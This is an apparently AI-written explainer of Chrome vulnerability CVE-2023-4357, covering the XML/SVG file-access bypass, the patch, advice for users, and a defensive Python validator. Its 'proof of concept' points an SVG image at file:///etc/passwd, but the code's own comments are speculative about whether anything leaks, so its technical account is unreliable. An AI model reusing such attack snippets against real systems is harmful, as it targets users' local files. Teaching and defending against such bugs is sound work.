In August 2023, Google patched a medium-severity vulnerability in Chrome: CVE-2023-4357. This bug stems from insufficient validation of untrusted input in XML, letting attackers bypass file access restrictions using a malicious HTML file. In simpler terms, a website could trick Chrome into opening or reading files on your computer that it shouldn't have access to.
Let’s break down what happened, see some code snippets, and understand how an exploit might work.
1. What is CVE-2023-4357?
CVE-2023-4357 is a flaw in how Chrome handles XML processing, especially when user-supplied input is included without proper validation. Chrome’s security relies on sandboxing and access restrictions that prevent websites from freely accessing your files. Because of this bug, a remote attacker could bypass those protections.
Affected versions:
Google Chrome prior to 116.0.5845.96
Reported as: Chromium Issue 1464237
Google advisory: Chrome Releases: Stable Channel Update for Desktop, 2023-08-15
2. How Did the Vulnerability Work?
Many web technologies use XML for data transfer. If a browser does not strictly check what kind of file is being loaded or how user input is handled in XML contexts, it can end up loading *dangerous* files, such as those from your local file system (file:// URLs).
The Problem
A crafted HTML file could use XML features to inject a file:// reference. Chrome failed to properly block such references in some contexts, especially when nested inside other XML or SVG content.
3. The Exploit - Step by Step
Goal: Read content from a restricted local file via a webpage.
1. The attacker's page loads an SVG or XML document with embedded user-controlled data.
2. The data contains a reference to a sensitive local file like file:///etc/passwd or file:///C:/Windows/System32/drivers/etc/hosts.
3. Chrome processes this without proper validation, fetching the file and exposing its contents to the attacker (for example, via onload events or DOM parsing).
Example Code Snippet
Below is a minimal proof of concept showing how an attacker might craft such a page. (Note: This is for educational purposes only!)
<!-- Save as evil.html and serve from a web server -->
<!DOCTYPE html>
<html>
  <body>
    <script>
      // Build an SVG document whose <image> points at a local file
      let svgData = `
        <svg xmlns="http://www.w3.org/2000/svg">
          <image href="file:///etc/passwd" width="500" height="500"/>
        </svg>
      `;
      // Wrap the SVG in a Blob and load it as an ordinary image
      let blob = new Blob([svgData], {type: "image/svg+xml"});
      let url = URL.createObjectURL(blob);
      let img = new Image();
      img.src = url;
      img.onload = function() {
        console.log("SVG loaded - check if file content is present!");
        // In some cases, the file content could leak through error or data events
      };
      document.body.appendChild(img);
    </script>
  </body>
</html>
What happens:
If Chrome allows it (on vulnerable versions), the SVG image tries to load content from a local file. If successful, the contents could be accessed by the attacker's script, especially if the browser fires events with error messages containing file contents, or if the image is rendered on the page.
Note: Modern Chrome blocks many such attempts, but before the fix some edge cases could bypass the restrictions.
4. How Was the Issue Fixed?
Google patched the vulnerability by adding stricter validation in how Chrome processes XML and SVG content referring to local files, so that user-supplied input cannot trigger file:// fetches in unauthorized contexts.
Fixed in: Chrome 116.0.5845.96 (August 2023).
5. How to Protect Yourself
- Update Chrome: make sure you’re running version 116 or higher.
- Be careful with suspicious links or attachments, especially those that open local files or ask for special permissions.
- Web developers should also sanitize any user input used in XML, even though browsers now add more protections.
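As an added, defender-side example (not code from the original post and not Chrome's actual patch), the Python check below parses untrusted SVG/XML before a web application embeds it and rejects any href, xlink:href or src attribute whose URL scheme is not on an allow-list, walking every nested element so a file:// reference buried inside inner SVG content is still caught. The attribute set and allow-list are assumptions to tune per application, and the sample documents are constructed.

```python
"""Reject untrusted SVG/XML that references local files before it is embedded.
Added example for the CVE-2023-4357 write-up; not Chrome's fix."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XLINK = "{http://www.w3.org/1999/xlink}"
# Attributes that make a browser fetch a URL (assumed set; extend per application).
URL_ATTRS = {"href", XLINK + "href", "src"}
# "" means a relative reference resolved against the page's own origin.
ALLOWED_SCHEMES = {"", "https", "data"}


def find_unsafe_refs(xml_text: str) -> list:
    """Return (tag, attribute, value) for every URL attribute whose scheme is
    not allowed. Walks all descendants, so nesting inside other SVG/XML
    (the case the write-up says Chrome missed) does not hide a reference."""
    upper = xml_text.upper()
    if "<!DOCTYPE" in upper or "<!ENTITY" in upper:
        # Refuse DTDs outright: entity declarations are another way to pull in files.
        return [("<document>", "DOCTYPE", "DTD/entity declarations not allowed")]
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("<document>", "parse", f"malformed XML: {exc}")]
    bad = []
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            if attr not in URL_ATTRS:
                continue
            # urlsplit lowercases the scheme, so FILE:// and file:// match alike.
            scheme = urlsplit(value.strip()).scheme
            if scheme not in ALLOWED_SCHEMES:
                bad.append((elem.tag.split("}")[-1], attr.split("}")[-1], value))
    return bad


def is_safe_svg(xml_text: str) -> bool:
    """True only when the document carries no disallowed URL references."""
    return not find_unsafe_refs(xml_text)


# Constructed samples: a benign image reference and the write-up's file:// case,
# nested one level deeper and using the xlink:href form.
GOOD_SVG = ('<svg xmlns="http://www.w3.org/2000/svg">'
            '<image href="https://example.com/a.png"/></svg>')
BAD_SVG = ('<svg xmlns="http://www.w3.org/2000/svg"><svg>'
           '<image xmlns:xlink="http://www.w3.org/1999/xlink" '
           'xlink:href="file:///etc/passwd"/></svg></svg>')

if __name__ == "__main__":
    print("good:", is_safe_svg(GOOD_SVG), "bad:", find_unsafe_refs(BAD_SVG))
```

A server-side check like this complements, rather than replaces, the browser fix: it stops a file:// or other off-list reference from ever reaching the client.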
6. Reference Links
- Chrome Release Note (2023-08-15)
- Chromium Security Bug 1464237 (restricted details)
- CVE-2023-4357 description (NVD)
Summary
CVE-2023-4357 is a reminder of how complex web browser security can be, and how edge cases, like XML processing, can lead to unexpected file leaks. Thanks to quick patching from Google the danger is minimized, but always keep your browser up to date and stay alert when handling files via the web.
*Exclusive post by AI for security learning. Please use this knowledge ethically and stay updated!*
Timeline
Published on: 08/15/2023 18:15:00 UTC
Last modified on: 08/27/2023 03:15:00 UTC